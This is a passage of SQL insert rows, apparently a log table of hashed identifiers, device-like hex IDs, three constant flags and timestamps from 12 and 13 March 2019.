(69279, '1226d7325b504162f0437d372666c1d2', 'a4606350cb27c277', 0, 2, 1, '2019-03-12 01:52:17'),
(69280, '1226d7325b504162f0437d372666c1d2', 'a4606350cb27c277', 0, 2, 1, '2019-03-12 01:52:25'),
(69281, '2beba89289325b48cbff80c1de2d8b0f', '3571b9315eefba1f', 0, 2, 1, '2019-03-12 01:57:34'),
(69282, '0b8a43d6182f4ebf6042343178a316d7', '16a202b9761a190a', 0, 2, 1, '2019-03-12 02:02:17'),
(69283, '1226d7325b504162f0437d372666c1d2', 'a4606350cb27c277', 0, 2, 1, '2019-03-12 02:07:40'),
(69284, '84e290aac5183c4deb420750d4726aee', '7e02bbf4d4e92987', 0, 2, 1, '2019-03-12 02:30:34'),
(69285, '84e290aac5183c4deb420750d4726aee', '7e02bbf4d4e92987', 0, 2, 1, '2019-03-12 02:41:01'),
(69286, '698557d9ec631e38952ba5db68eb5850', 'ddcd269428326cc0', 0, 2, 1, '2019-03-12 02:41:35'),
(69287, '970d3227349b7170ba45c3e3c2ebf875', '1b63f1ede89a9833', 0, 2, 1, '2019-03-12 02:47:55'),
(69288, '84e290aac5183c4deb420750d4726aee', '7e02bbf4d4e92987', 0, 2, 1, '2019-03-12 02:53:03'),
(69289, 'e83d73a88e762cdc9bbc6882303db439', 'df27b9a2919a8206', 0, 2, 1, '2019-03-12 03:06:42'),
(69290, '84e290aac5183c4deb420750d4726aee', '7e02bbf4d4e92987', 0, 2, 1, '2019-03-12 03:07:31'),
(69291, 'e83d73a88e762cdc9bbc6882303db439', 'df27b9a2919a8206', 0, 2, 1, '2019-03-12 03:08:26'),
(69292, '64a41f22d5f67f2c9e66f6740444af8e', '575b738595cdb2f5', 0, 2, 1, '2019-03-12 03:14:30'),
(69293, 'c26e8b4fb7dc753228b31ba44597bb6f', '27ec4f509966b603', 0, 2, 1, '2019-03-12 04:25:36'),
(69294, '1738106af598a5d4360fdb51afd7c011', '932e93c57311c1b1', 0, 2, 1, '2019-03-12 04:44:43'),
(69295, 'eb26a338381018ef17a59b4e550b70bc', 'ec10e8027cbbe537', 0, 2, 1, '2019-03-12 04:52:08'),
(69296, '7f2fed33125d601ec78089c15d676c84', '24e21fdb89eef6c3', 0, 2, 1, '2019-03-12 04:55:31'),
(69297, '8e78ef43dde463d1565770b7b42e0174', 'ec10e8027cbbe537', 0, 2, 1, '2019-03-12 04:55:37'),
(69298, 'a94e9f2f638a028fc48e38d7ea0444f9', '0f34f1e8897f8db7', 0, 2, 1, '2019-03-12 04:57:24'),
(69299, 'd2b533464cc9e9835ed59b2a6f39c3d0', 'e45f433e677c5b4b', 0, 2, 1, '2019-03-12 04:57:43'),
(69300, 'd2b533464cc9e9835ed59b2a6f39c3d0', 'e45f433e677c5b4b', 0, 2, 1, '2019-03-12 04:59:22'),
(69301, 'd2b533464cc9e9835ed59b2a6f39c3d0', 'e45f433e677c5b4b', 0, 2, 1, '2019-03-12 04:59:49'),
(69302, 'd2b533464cc9e9835ed59b2a6f39c3d0', 'e45f433e677c5b4b', 0, 2, 1, '2019-03-12 05:00:11'),
(69303, 'd2b533464cc9e9835ed59b2a6f39c3d0', 'e45f433e677c5b4b', 0, 2, 1, '2019-03-12 05:00:28'),
(69304, 'd2b533464cc9e9835ed59b2a6f39c3d0', 'e45f433e677c5b4b', 0, 2, 1, '2019-03-12 05:03:36'),
(69305, 'd2b533464cc9e9835ed59b2a6f39c3d0', 'e45f433e677c5b4b', 0, 2, 1, '2019-03-12 05:04:32'),
(69306, 'd2b533464cc9e9835ed59b2a6f39c3d0', 'e45f433e677c5b4b', 0, 2, 1, '2019-03-12 05:04:40'),
(69307, '8d445f367a6f56ea415e31e32f45adbd', '6e620e24fd9fda89', 0, 2, 1, '2019-03-12 05:26:32'),
(69308, '8d445f367a6f56ea415e31e32f45adbd', '6e620e24fd9fda89', 0, 2, 1, '2019-03-12 05:27:04'),
(69309, '20e0a785177afb5df529ccdd57c6ca63', 'e3ad3b0cac84f8a3', 0, 2, 1, '2019-03-12 05:45:53'),
(69310, '14ab44d4060851a7983f98ff9c8ec9cf', 'e3413f2163c4f64a', 0, 2, 1, '2019-03-12 06:32:19'),
(69311, '216f1874bf2939ae5fe24291b828be91', '8bde1c7a0891495f', 0, 2, 1, '2019-03-12 07:15:00'),
(69312, '13bea44e77d9096ae42bd4e0be84f446', '8e2ec3dc3a09c085', 0, 2, 1, '2019-03-12 07:18:15'),
(69313, '4e9c3eb5189e51e54e8b36aea9d21574', 'b2f4a1e6414ac742', 0, 2, 1, '2019-03-12 07:22:54'),
(69314, '25bfad189807b2b62a39e743d6044294', '788bc96ed5d0e5f3', 0, 2, 1, '2019-03-12 07:37:06'),
(69315, '7e1d16a31707f85948707baa915fd0c9', 'bc713e66e3d3b8fb', 0, 2, 1, '2019-03-12 07:48:12'),
(69316, '14ab44d4060851a7983f98ff9c8ec9cf', 'e3413f2163c4f64a', 0, 2, 1, '2019-03-12 07:56:49'),
(69317, '0ecddb6fe92b7c3a8dca29d228f20752', '0efc0c270ec364b3', 0, 2, 1, '2019-03-12 07:57:17'),
(69318, '1ba325f6d92bbb2a8a305b0d5c853aef', '01f209a82a92a49f', 0, 2, 1, '2019-03-12 08:31:58'),
(69319, '2f76fde2eda7b6089ab48d3ca21421cb', '08fc17434fa17d3e', 0, 2, 1, '2019-03-12 08:54:17'),
(69320, '715b379648888d2434e6083dab42be92', '2db8aebd40eedced', 0, 2, 1, '2019-03-12 09:06:16'),
(69321, '2ea1c5ebe4108b8ec907509180b6d0a3', 'd6f9956e1771a48b', 0, 2, 1, '2019-03-12 09:16:38'),
(69322, 'e9d61df660b62a5d1b5228ebf2ef2f56', '31c02628301e63ff', 0, 2, 1, '2019-03-12 10:31:56'),
(69323, '14ab44d4060851a7983f98ff9c8ec9cf', 'e3413f2163c4f64a', 0, 2, 1, '2019-03-12 10:35:09'),
(69324, '14ab44d4060851a7983f98ff9c8ec9cf', 'e3413f2163c4f64a', 0, 2, 1, '2019-03-12 10:36:19'),
(69325, 'e71326d08c3af945f52612b99cad2e71', '1aac15e165a267c0', 0, 2, 1, '2019-03-12 11:12:23'),
(69326, 'b019371a9bad48d2ee6c826b2382cdba', 'e8f28bd63e1e0a86', 0, 2, 1, '2019-03-12 11:19:10'),
(69327, 'b019371a9bad48d2ee6c826b2382cdba', 'e8f28bd63e1e0a86', 0, 2, 1, '2019-03-12 11:31:57'),
(69328, '0b5ed80c8dfc9c72c507f4a762a23b9b', 'ffa7940a024f9c0f', 0, 2, 1, '2019-03-12 11:45:21'),
(69329, '62f27fe7b042a73549c05b2a5bf3ddce', 'd6be9abe569b8e5e', 0, 2, 1, '2019-03-12 11:58:07'),
(69330, '592386377019b192f9c9cb1341311f25', 'a6570ba9117b8f87', 0, 2, 1, '2019-03-12 12:00:33'),
(69331, 'b9b7f9f50731a87178af508cd0e831c4', 'c3e79d312f8ed0c5', 0, 2, 1, '2019-03-12 12:09:04'),
(69332, 'f5cf1359cb2e3c95496e570cad72e884', '0df53e0ed2f3ac2f', 0, 2, 1, '2019-03-12 12:13:47'),
(69333, '928fc94b63de7299aa1aeb9421cedef5', 'ec75ee4241fa992c', 0, 2, 1, '2019-03-12 12:24:27'),
(69334, '06a1e5e7da3a7377449367bed048da3b', '4e1042c72e276305', 0, 2, 1, '2019-03-12 12:32:38'),
(69335, '0b60756fcf78da4f17e62d504da88a27', '3ba3484de462963c', 0, 2, 1, '2019-03-12 12:48:19'),
(69336, '0b60756fcf78da4f17e62d504da88a27', '3ba3484de462963c', 0, 2, 1, '2019-03-12 12:49:06'),
(69337, '6a737d78227cb80eea7941c4de36edf3', '339f534967e1bbb2', 0, 2, 1, '2019-03-12 12:55:05'),
(69338, 'fff4e724d683c49570e1c8a2e385fc75', '8d0ce8d2f494ec99', 0, 2, 1, '2019-03-12 13:28:21'),
(69339, '20e0a785177afb5df529ccdd57c6ca63', 'e3ad3b0cac84f8a3', 0, 2, 1, '2019-03-12 13:49:45'),
(69340, 'b3ea2892f6ebfa4c26366ffb62c5ac7d', '78b185fe1d337b76', 0, 2, 1, '2019-03-12 13:57:35'),
(69341, 'b3ea2892f6ebfa4c26366ffb62c5ac7d', '78b185fe1d337b76', 0, 2, 1, '2019-03-12 14:02:20'),
(69342, 'b3ea2892f6ebfa4c26366ffb62c5ac7d', '78b185fe1d337b76', 0, 2, 1, '2019-03-12 14:06:54'),
(69343, '3694d5351f5e6b087099641151f18d3c', '536cab961cf54615', 0, 2, 1, '2019-03-12 14:10:21'),
(69344, '61aa814f52823a6e742dddf46e2ce627', '09db5faadead3be4', 0, 2, 1, '2019-03-12 14:19:42'),
(69345, 'f70805381b4bb9206e3f584499044023', 'd69ba4f9a19ba678', 0, 2, 1, '2019-03-12 14:22:43'),
(69346, '97d31665f905d1944a8b46c7bb30cc37', '4a38d105db3f499b', 0, 2, 1, '2019-03-12 14:36:42'),
(69347, '97d31665f905d1944a8b46c7bb30cc37', '4a38d105db3f499b', 0, 2, 1, '2019-03-12 14:37:39'),
(69348, 'e06155ea0fd334b1ec1300f03478ead5', 'ae2d253e3105fd55', 0, 2, 1, '2019-03-12 15:26:17'),
(69349, '354194b3bde58eb9bef5ee57ac9331c3', '6551472730717e35', 0, 2, 1, '2019-03-12 15:37:07'),
(69350, '54ff8eb3f8a075877592d532bd67ebd8', '05be220da175a4ea', 0, 2, 1, '2019-03-12 15:41:47'),
(69351, '54ff8eb3f8a075877592d532bd67ebd8', '05be220da175a4ea', 0, 2, 1, '2019-03-12 15:42:22'),
(69352, '7f89bee88c3178fd7b7a5f739b79f426', '07ada621342ae5d6', 0, 2, 1, '2019-03-12 15:59:22'),
(69353, '7f89bee88c3178fd7b7a5f739b79f426', '07ada621342ae5d6', 0, 2, 1, '2019-03-12 15:59:41'),
(69354, '7f89bee88c3178fd7b7a5f739b79f426', '07ada621342ae5d6', 0, 2, 1, '2019-03-12 16:00:52'),
(69355, '7f89bee88c3178fd7b7a5f739b79f426', '07ada621342ae5d6', 0, 2, 1, '2019-03-12 16:05:21'),
(69356, '7f89bee88c3178fd7b7a5f739b79f426', '07ada621342ae5d6', 0, 2, 1, '2019-03-12 16:07:15'),
(69357, '040619d0495f20e14554ec393c4c9b14', 'c86f6dfae447c57f', 0, 2, 1, '2019-03-12 16:09:05'),
(69358, 'ec16b918537f27688c7a1bfbcada9ab9', '69ffef2558853a6f', 0, 2, 1, '2019-03-12 16:10:10'),
(69359, 'df58ef6338f6b6c1002ad6413a008653', '17c4c10bd238d11b', 0, 2, 1, '2019-03-12 16:23:47'),
(69360, '9166e7ee8dab6a179b74f45155c95500', '863b661787591b2d', 0, 2, 1, '2019-03-12 17:32:00'),
(69361, '8329f0713139f6b967f02042b8021032', 'ca6408ef8ef58c64', 0, 2, 1, '2019-03-12 17:33:09'),
(69362, '942829dbe5331961c13b87fe876372e1', 'f1a572651f849cff', 0, 2, 1, '2019-03-12 17:34:33'),
(69363, '030db092a69d5a2aaac3a863b49c3aad', '863b661787591b2d', 0, 2, 1, '2019-03-12 17:36:15'),
(69364, '030db092a69d5a2aaac3a863b49c3aad', '863b661787591b2d', 0, 2, 1, '2019-03-12 17:43:41'),
(69365, 'b4d60c85ed529996a198fd55314204c7', 'a8df79d042727af2', 0, 2, 1, '2019-03-12 18:03:57'),
(69366, '8f0e5d508593f22af391c3e9bc6a2311', 'b15eefba54e68a7e', 0, 2, 1, '2019-03-12 18:09:05'),
(69367, '030db092a69d5a2aaac3a863b49c3aad', '863b661787591b2d', 0, 2, 1, '2019-03-12 18:25:41'),
(69368, 'cdeac704351392f28b6430dbeb29dcef', '1760abd81c12ba57', 0, 2, 1, '2019-03-12 18:43:49'),
(69369, '87f86df3f1a0bb4b817c9e93bfe4d74d', '180987d485c5b99a', 0, 2, 1, '2019-03-12 18:52:57'),
(69370, '3631726c152c69071c2979924219e287', 'b57104b37a2d8fd8', 0, 2, 1, '2019-03-12 19:10:10'),
(69371, '83d438f169b2d5bdeaa42d8f0a30b217', '0126f5e8f14d2471', 0, 2, 1, '2019-03-12 19:44:05'),
(69372, '83d438f169b2d5bdeaa42d8f0a30b217', '0126f5e8f14d2471', 0, 2, 1, '2019-03-12 19:44:19'),
(69373, '83d438f169b2d5bdeaa42d8f0a30b217', '0126f5e8f14d2471', 0, 2, 1, '2019-03-12 19:46:26'),
(69374, '546a8faff28a3ed5606cd3d1555e8b08', '14bddb2e3cc0431b', 0, 2, 1, '2019-03-12 20:04:34'),
(69375, '2e5de83e13b8d15c803ea983071e2052', '49d0d6be8ba8cfc0', 0, 2, 1, '2019-03-12 21:04:31'),
(69376, '34aefa34834d04c42b65e87172170fc4', '407198c79af506a8', 0, 2, 1, '2019-03-12 21:27:59'),
(69377, 'ad573d07565711a70f956886d857cb54', '826ffa39fb70cfa6', 0, 2, 1, '2019-03-12 21:35:41'),
(69378, '845bb2efc714ce7e34d8c9c98ff602c1', '0530018377078939', 0, 2, 1, '2019-03-12 21:39:07'),
(69379, 'c70605bcd1e2cdf927ab59d6d19e779f', 'bb0afb5877b90a56', 0, 2, 1, '2019-03-12 21:55:06'),
(69380, '7d5f9b4b7a8c9bf65b280762a2a06057', '7786975d7fc79965', 0, 2, 1, '2019-03-12 23:25:39'),
(69381, '8c2db7a0df048be3d002a4e49826bf25', 'e3413f2163c4f64a', 0, 2, 1, '2019-03-13 01:02:53'),
(69382, '88d82a1f4665f7ba0c13795337eaac20', '960d12b6c14f65ca', 0, 2, 1, '2019-03-13 01:17:01'),
(69383, 'c68daec31ab782a7b1f60ce4294cf7c1', '44a6b23e2375f80e', 0, 2, 1, '2019-03-13 01:43:43'),
(69384, 'ec33e877e5bc8b52d811dcaab3ec745b', 'f3f3de8bf97f7b07', 0, 2, 1, '2019-03-13 03:27:23'),
(69385, '1269269ca3a1ee5d1e25a57833dc3636', '4d6342ec4c6ff31a', 0, 2, 1, '2019-03-13 03:50:44'),
(69386, '8d853f36e3e9ea4f571870dd8448b6e3', '826ffa39fb70cfa6', 0, 2, 1, '2019-03-13 04:46:04'),
(69387, '80ae0fb90aa9f038ab03de19a9aba449', 'bbc8b814070505bd', 0, 2, 1, '2019-03-13 04:54:04'),
(69388, '8d853f36e3e9ea4f571870dd8448b6e3', '826ffa39fb70cfa6', 0, 2, 1, '2019-03-13 04:56:19'),
(69389, '8d853f36e3e9ea4f571870dd8448b6e3', '826ffa39fb70cfa6', 0, 2, 1, '2019-03-13 05:01:20'),
(69390, '4b066e8e4da46d3e1deb3f7271aca2c6', '5fd8810cbf2b927b', 0, 2, 1, '2019-03-13 05:19:20'),
(69391, '8d853f36e3e9ea4f571870dd8448b6e3', '826ffa39fb70cfa6', 0, 2, 1, '2019-03-13 05:26:21'),
(69392, '1226d7325b504162f0437d372666c1d2', 'a4606350cb27c277', 0, 2, 1, '2019-03-13 06:30:40'),
(69393, 'f9a42df42e702e1e405de694653b9062', '21ff154eec309906', 0, 2, 1, '2019-03-13 06:42:28'),
(69394, '09abe18933afe811e9ce817fbe1f2b35', '35f63bec5f069bf8', 0, 2, 1, '2019-03-13 07:09:28'),
(69395, 'cebedf41ca463c245cdb79e4ab1b1330', 'fcb5958566232b7a', 0, 2, 1, '2019-03-13 07:19:51'),
(69396, 'c138efef39f91410eae013d917ed9e6a', '4056adb279342833', 0, 2, 1, '2019-03-13 07:36:03'),
(69397, '52f62c391188676e968027bf27231480', '0df53e0ed2f3ac2f', 0, 2, 1, '2019-03-13 07:45:19'),
(69398, 'cfdcbc513ef387ca670a4259d67902ba', '16fa59fa1a030bac', 0, 2, 1, '2019-03-13 08:07:38'),
(69399, '49182d6c58d13aaeca2ef9dbf78c1560', '9b39f9542b762ffb', 0, 2, 1, '2019-03-13 08:13:00'),
(69400, '3b32820a7c05a147565744bbc99370cb', '54bbfb4e8d95ccef', 0, 2, 1, '2019-03-13 09:03:55'),
(69401, '782607ac9d871cc9d61a3840914224f9', 'b334824b6ce82a98', 0, 2, 1, '2019-03-13 09:34:23'),
(69402, '6b98f59442b6c42faa8fb19f90157fb8', '1d1658c97bef6ed6', 0, 2, 1, '2019-03-13 09:49:42'),
(69403, '6b98f59442b6c42faa8fb19f90157fb8', '1d1658c97bef6ed6', 0, 2, 1, '2019-03-13 09:50:15'),
(69404, 'd0795937659c2a8742b8a618557e53b2', '466927b1ae961144', 0, 2, 1, '2019-03-13 10:16:55'),
(69405, 'e63bb74b7c9fc1aac41f64d8c7c3b96f', '7c5bcf99f2070582', 0, 2, 1, '2019-03-13 10:34:34'),
(69406, 'e63bb74b7c9fc1aac41f64d8c7c3b96f', '7c5bcf99f2070582', 0, 2, 1, '2019-03-13 10:34:56'),
(69407, 'e63bb74b7c9fc1aac41f64d8c7c3b96f', '7c5bcf99f2070582', 0, 2, 1, '2019-03-13 10:35:55'),
(69408, 'e63bb74b7c9fc1aac41f64d8c7c3b96f', '7c5bcf99f2070582', 0, 2, 1, '2019-03-13 10:36:15'),
(69409, 'b57ed737aa6a05f2554e41c58a55b0a1', '0c3d690f5962e4c2', 0, 2, 1, '2019-03-13 10:37:48'),
(69410, '123eddd3aa4273b9c27d8328b9b7fb1e', 'cca6d1d4070c2e08', 0, 2, 1, '2019-03-13 10:39:07'),
(69411, '123eddd3aa4273b9c27d8328b9b7fb1e', 'cca6d1d4070c2e08', 0, 2, 1, '2019-03-13 10:44:26'),
(69412, '123eddd3aa4273b9c27d8328b9b7fb1e', 'cca6d1d4070c2e08', 0, 2, 1, '2019-03-13 10:44:47'),
(69413, '123eddd3aa4273b9c27d8328b9b7fb1e', 'cca6d1d4070c2e08', 0, 2, 1, '2019-03-13 10:45:18'),
(69414, '123eddd3aa4273b9c27d8328b9b7fb1e', 'cca6d1d4070c2e08', 0, 2, 1, '2019-03-13 10:46:17'),
(69415, '58544f08de83e214d15d6445efd52d41', '7c5bcf99f2070582', 0, 2, 1, '2019-03-13 10:47:30'),
(69416, '73648093b9dc1e13ebf78e6d1316b8f2', '624d6937076d1188', 0, 2, 1, '2019-03-13 10:48:49'),
(69417, '58544f08de83e214d15d6445efd52d41', '7c5bcf99f2070582', 0, 2, 1, '2019-03-13 10:49:03'),
(69418, 'a5b3e4c9d9121ffc70f5aaa165c7e6b1', '6dc95274b141943a', 0, 2, 1, '2019-03-13 10:50:21'),
(69419, '4e7456acda6e5f7f12330e495630629a', 'aad74cfc2e5a8b02', 0, 2, 1, '2019-03-13 11:03:39'),
(69420, '782607ac9d871cc9d61a3840914224f9', 'b334824b6ce82a98', 0, 2, 1, '2019-03-13 11:23:21'),
(69421, '782607ac9d871cc9d61a3840914224f9', 'b334824b6ce82a98', 0, 2, 1, '2019-03-13 11:23:29'),
(69422, '782607ac9d871cc9d61a3840914224f9', 'b334824b6ce82a98', 0, 2, 1, '2019-03-13 11:27:28'),
(69423, '782607ac9d871cc9d61a3840914224f9', 'b334824b6ce82a98', 0, 2, 1, '2019-03-13 11:28:58'),
(69424, '584ef0e062466a728208efcdca372c6c', '7acf3ad305c0b27f', 0, 2, 1, '2019-03-13 12:12:25'),
(69425, '584ef0e062466a728208efcdca372c6c', '7acf3ad305c0b27f', 0, 2, 1, '2019-03-13 12:12:52'),
(69426, '3a3f8505a1a5f903c5c099f557311731', 'f9ae96241efe78e8', 0, 2, 1, '2019-03-13 12:36:13'),
(69427, '7c3e7042d1bb1beb90f3e3d0f4badb43', '2ce7624136f2bd07', 0, 2, 1, '2019-03-13 12:44:28'),
(69428, 'eddc0b817a3531b074f18805f10398d5', '8ad007cf09224cd8', 0, 2, 1, '2019-03-13 13:16:52'),
(69429, 'eddc0b817a3531b074f18805f10398d5', '8ad007cf09224cd8', 0, 2, 1, '2019-03-13 13:17:01'),
(69430, 'eddc0b817a3531b074f18805f10398d5', '8ad007cf09224cd8', 0, 2, 1, '2019-03-13 13:17:40'),
(69431, 'eddc0b817a3531b074f18805f10398d5', '8ad007cf09224cd8', 0, 2, 1, '2019-03-13 13:18:12'),
(69432, 'eddc0b817a3531b074f18805f10398d5', '8ad007cf09224cd8', 0, 2, 1, '2019-03-13 13:18:30'),
(69433, 'ee3405fa29cf979317ef2bc81306c540', '4391f79365a98a70', 0, 2, 1, '2019-03-13 14:04:22'),
(69434, 'ee3405fa29cf979317ef2bc81306c540', '4391f79365a98a70', 0, 2, 1, '2019-03-13 14:05:14'),
(69435, 'bd5cdebe2d339a01cc58fd3b5e905fe6', '0d0279814be8767b', 0, 2, 1, '2019-03-13 15:04:17'),
(69436, 'ffac1ba1eb17181e893dc6a75091b484', '624d6937076d1188', 0, 2, 1, '2019-03-13 15:10:41'),
(69437, 'e1b19a1aac70e6e2fbe36adecdc7086a', 'd9c62bfc26724fc4', 0, 2, 1, '2019-03-13 15:17:22'),
(69438, 'e1b19a1aac70e6e2fbe36adecdc7086a', 'd9c62bfc26724fc4', 0, 2, 1, '2019-03-13 15:19:12'),
(69439, 'e1b19a1aac70e6e2fbe36adecdc7086a', 'd9c62bfc26724fc4', 0, 2, 1, '2019-03-13 15:19:41'),
(69440, 'e1b19a1aac70e6e2fbe36adecdc7086a', 'd9c62bfc26724fc4', 0, 2, 1, '2019-03-13 15:19:54'),
(69441, 'e1b19a1aac70e6e2fbe36adecdc7086a', 'd9c62bfc26724fc4', 0, 2, 1, '2019-03-13 15:20:30'),
(69442, 'e1b19a1aac70e6e2fbe36adecdc7086a', 'd9c62bfc26724fc4', 0, 2, 1, '2019-03-13 15:20:45'),
(69443, 'e1b19a1aac70e6e2fbe36adecdc7086a', 'd9c62bfc26724fc4', 0, 2, 1, '2019-03-13 15:21:03'),
(69444, 'e1b19a1aac70e6e2fbe36adecdc7086a', 'd9c62bfc26724fc4', 0, 2, 1, '2019-03-13 15:21:27'),
(69445, 'e1b19a1aac70e6e2fbe36adecdc7086a', 'd9c62bfc26724fc4', 0, 2, 1, '2019-03-13 15:22:35'),
(69446, 'e1b19a1aac70e6e2fbe36adecdc7086a', 'd9c62bfc26724fc4', 0, 2, 1, '2019-03-13 15:22:48'),
(69447, 'd1e34df7ee2dfb5497e0c52dccfed2c2', '19845a57f7433329', 0, 2, 1, '2019-03-13 15:22:55'),
(69448, '58544f08de83e214d15d6445efd52d41', '7c5bcf99f2070582', 0, 2, 1, '2019-03-13 15:23:02'),
(69449, '2791ea407c238d447b875bf6cde2c958', 'e3413f2163c4f64a', 0, 2, 1, '2019-03-13 15:25:11'),
(69450, '32a4e53f40351b49f3716f182a824461', '22af331e0141ab34', 0, 2, 1, '2019-03-13 15:27:01'),
(69451, '6a737d78227cb80eea7941c4de36edf3', '339f534967e1bbb2', 0, 2, 1, '2019-03-13 15:47:11'),
(69452, 'e1b19a1aac70e6e2fbe36adecdc7086a', 'd9c62bfc26724fc4', 0, 2, 1, '2019-03-13 15:47:37'),
(69453, 'f7561b9e9d49d02e28d9022f118e8488', '59bb5978882acfd8', 0, 2, 1, '2019-03-13 15:48:25'),
(69454, 'b96ce2b696f4f646485bb77ccf9583bd', '687058b58830fd3e', 0, 2, 1, '2019-03-13 15:49:01'),
(69455, 'e1b19a1aac70e6e2fbe36adecdc7086a', 'd9c62bfc26724fc4', 0, 2, 1, '2019-03-13 15:49:02'),
(69456, 'b96ce2b696f4f646485bb77ccf9583bd', '687058b58830fd3e', 0, 2, 1, '2019-03-13 15:49:39'),
(69457, '354194b3bde58eb9bef5ee57ac9331c3', '6551472730717e35', 0, 2, 1, '2019-03-13 15:51:51'),
(69458, '354194b3bde58eb9bef5ee57ac9331c3', '6551472730717e35', 0, 2, 1, '2019-03-13 15:52:06'),
(69459, 'ce3effeac97c3db5eb1d7db24a248fcf', '503a514a8daa32a7', 0, 2, 1, '2019-03-13 15:53:19'),
(69460, 'e1b19a1aac70e6e2fbe36adecdc7086a', 'd9c62bfc26724fc4', 0, 2, 1, '2019-03-13 15:53:26'),
(69461, 'e1b19a1aac70e6e2fbe36adecdc7086a', 'd9c62bfc26724fc4', 0, 2, 1, '2019-03-13 15:53:47'),
(69462, 'ce3effeac97c3db5eb1d7db24a248fcf', '503a514a8daa32a7', 0, 2, 1, '2019-03-13 15:53:50'),
(69463, 'd2b5a127b83fe4d25fb824301a590c26', '332723ec6654d9f5', 0, 2, 1, '2019-03-13 15:54:29'),
(69464, 'b96ce2b696f4f646485bb77ccf9583bd', '687058b58830fd3e', 0, 2, 1, '2019-03-13 15:56:20'),
(69465, 'b96ce2b696f4f646485bb77ccf9583bd', '687058b58830fd3e', 0, 2, 1, '2019-03-13 16:00:28'),
(69466, '0ba31fe1027a02c5edb8ede02d0f53ca', '14d059e5da6bdba4', 0, 2, 1, '2019-03-13 16:00:51'),
(69467, 'b96ce2b696f4f646485bb77ccf9583bd', '687058b58830fd3e', 0, 2, 1, '2019-03-13 16:00:55'),
(69468, '2fe069c205f486f6174058bb4c666906', '32b169e936bbe5df', 0, 2, 1, '2019-03-13 16:01:01'),
(69469, '6a8fa87fd0e202fec5a5e538fbb928c8', 'd83be9192f556fc0', 0, 2, 1, '2019-03-13 16:01:07'),
(69470, '4c6a4739e38d9fdc598156dd1c9ab2f3', 'b4ecb18ba7992a18', 0, 2, 1, '2019-03-13 16:01:19'),
(69471, '0ba31fe1027a02c5edb8ede02d0f53ca', '14d059e5da6bdba4', 0, 2, 1, '2019-03-13 16:01:43'),
(69472, '1fa3ee0a35ff066103f7c3cd702d8f5b', 'df27b9a2919a8206', 0, 2, 1, '2019-03-13 16:01:53'),
(69473, '0ba31fe1027a02c5edb8ede02d0f53ca', '14d059e5da6bdba4', 0, 2, 1, '2019-03-13 16:01:58'),
(69474, '4d20775fdacd2d93fde65db203d4e0dc', 'b2bafb74467116e9', 0, 2, 1, '2019-03-13 16:03:41'),
(69475, 'df38b3b75f857da0c72c5a5691960ec9', 'b512fd170584454c', 0, 2, 1, '2019-03-13 16:04:22'),
(69476, '91c93b149902513645cefead6c1deaa3', 'df2f194cea195593', 0, 2, 1, '2019-03-13 16:05:12'),
(69477, '52f979f11923a080920ea36b2202a272', 'edfe950d47379572', 0, 2, 1, '2019-03-13 16:06:09'),
(69478, '52f979f11923a080920ea36b2202a272', 'edfe950d47379572', 0, 2, 1, '2019-03-13 16:06:20'),
(69479, 'f57f4d587699e9ed7daaa7b1a76be235', '6a89d528339f9c98', 0, 2, 1, '2019-03-13 16:06:39'),
(69480, '0ba31fe1027a02c5edb8ede02d0f53ca', '14d059e5da6bdba4', 0, 2, 1, '2019-03-13 16:07:28'),
(69481, '94b10fdd936f4ec243498721ba96eb03', 'a639f655bef0fc87', 0, 2, 1, '2019-03-13 16:08:51'),
(69482, '0c8301e63894c43b030f7bdbd7643995', '503a514a8daa32a7', 0, 2, 1, '2019-03-13 16:09:10'),
(69483, '1dcdbab1df7cf7f25b2594858ceab53b', '196ae7616c94df27', 0, 2, 1, '2019-03-13 16:10:36'),
(69484, 'a2a94d263cede0609dc1c1c55a020b48', '1c68b977b911188c', 0, 2, 1, '2019-03-13 16:10:45'),
(69485, '0c8301e63894c43b030f7bdbd7643995', '503a514a8daa32a7', 0, 2, 1, '2019-03-13 16:11:13'),
(69486, '1dcdbab1df7cf7f25b2594858ceab53b', '196ae7616c94df27', 0, 2, 1, '2019-03-13 16:12:11'),
(69487, '41837d124e464943505e6605609d7ecf', 'b69d18fdffdf28df', 0, 2, 1, '2019-03-13 16:12:26'),
(69488, 'a8848d79e675ba660f53ebfd492ee35d', '904358f993c30446', 0, 2, 1, '2019-03-13 16:12:29'),
(69489, 'f2b4d03c00b1cb4920a85dbc4661df4c', '5e079f4a56e7324d', 0, 2, 1, '2019-03-13 16:13:05'),
(69490, 'b23bebab62fd31cee7f8699ae1ed9f22', 'c69b16a8ac60521f', 0, 2, 1, '2019-03-13 16:14:13'),
(69491, '6a5f4e24ace009ad159f33d2aa3cd0ef', '91310be2b2e2849b', 0, 2, 1, '2019-03-13 16:14:45'),
(69492, 'ad9e01e1fdd94985f211dd58e09c0d22', 'f19010d8a5f137d0', 0, 2, 1, '2019-03-13 16:15:37'),
(69493, 'f79ac247f18d9f7666befdb55aea978b', '402692e46d0378b1', 0, 2, 1, '2019-03-13 16:15:48'),
(69494, '58544f08de83e214d15d6445efd52d41', '7c5bcf99f2070582', 0, 2, 1, '2019-03-13 16:16:29'),
(69495, '81baece6b8081423420490000f8201b8', '3de88ff4581dab27', 0, 2, 1, '2019-03-13 16:17:42'),
(69496, 'adc302d509e79924c9555c65b53874ce', '7501b42c35accff7', 0, 2, 1, '2019-03-13 16:17:47'),
(69497, 'adc302d509e79924c9555c65b53874ce', '7501b42c35accff7', 0, 2, 1, '2019-03-13 16:17:48'),
(69498, 'fa58cdeb6341aab3a3e3f1b2dcd4fe27', '0f82ee3c80278677', 0, 2, 1, '2019-03-13 16:18:06'),
(69499, 'c5724e62ec7c3411b8eff4f5d8f3856e', '074ec8007ba74449', 0, 2, 1, '2019-03-13 16:18:44'),
(69500, '748abe97823fb4345f6d36b9af786e49', '19ac418837a1bfb6', 0, 2, 1, '2019-03-13 16:19:04'),
(69501, '23dc152466ebc66f13ca81e8995f17a7', '1791b1aeb2327e22', 0, 2, 1, '2019-03-13 16:20:12'),
(69502, '73feccfe6a69b14ed624ec93da3808c0', '795389e4f62dddae', 0, 2, 1, '2019-03-13 16:20:26'),
(69503, '58544f08de83e214d15d6445efd52d41', '7c5bcf99f2070582', 0, 2, 1, '2019-03-13 16:22:31'),
(69504, '75121438595df0e714a801a01e4351c3', 'cad202a09758cb3a', 0, 2, 1, '2019-03-13 16:24:20'),
(69505, 'e01498c1e906ddd51e43b894ec11bea4', 'abda31d81247fcb2', 0, 2, 1, '2019-03-13 16:24:32'),
(69506, 'ea4fd819c1edd9a72a508eb2b7a3c836', '1d1658c97bef6ed6', 0, 2, 1, '2019-03-13 16:25:09'),
